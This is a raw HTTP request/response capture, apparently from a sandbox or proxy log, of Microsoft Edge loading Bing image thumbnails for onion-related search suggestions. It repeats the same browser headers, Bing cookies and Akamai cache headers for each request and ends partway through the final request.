sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7068
cache-control: public, max-age=5183995
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f435a
x-check-cacheable: YES
GET

https://th.bing.com/th?q=The+Onion+T-Ball+Retard&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=The+Onion+T-Ball+Retard&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1778
cache-control: public, max-age=2592000
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4370
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Onion+1Kg&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Onion+1Kg&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1302
cache-control: public, max-age=2591927
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4372
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Crunchy+Chili+Onion+Sauce&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Crunchy+Chili+Onion+Sauce&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5104
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4350
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Ojan+Logo&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Ojan+Logo&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1949
cache-control: public, max-age=1209600
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f436e
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Pirgels+Sawer+Greem+End+Onjon&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Pirgels+Sawer+Greem+End+Onjon&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6135
cache-control: public, max-age=2592000
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4364
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Good+Things+to+Made+with+Onion&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Good+Things+to+Made+with+Onion&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2001
x-check-cacheable: YES
cache-control: public, max-age=633511
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4366
GET

https://th.bing.com/th?q=Onion+in+a+Cocomelon&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Onion+in+a+Cocomelon&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2010
cache-control: public, max-age=2591993
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4371
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Show+Me+a+Onion&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Show+Me+a+Onion&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2222
x-check-cacheable: YES
cache-control: public, max-age=1184815
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4342
GET

https://th.bing.com/th?q=Kissing+with+Onions&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Kissing+with+Onions&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
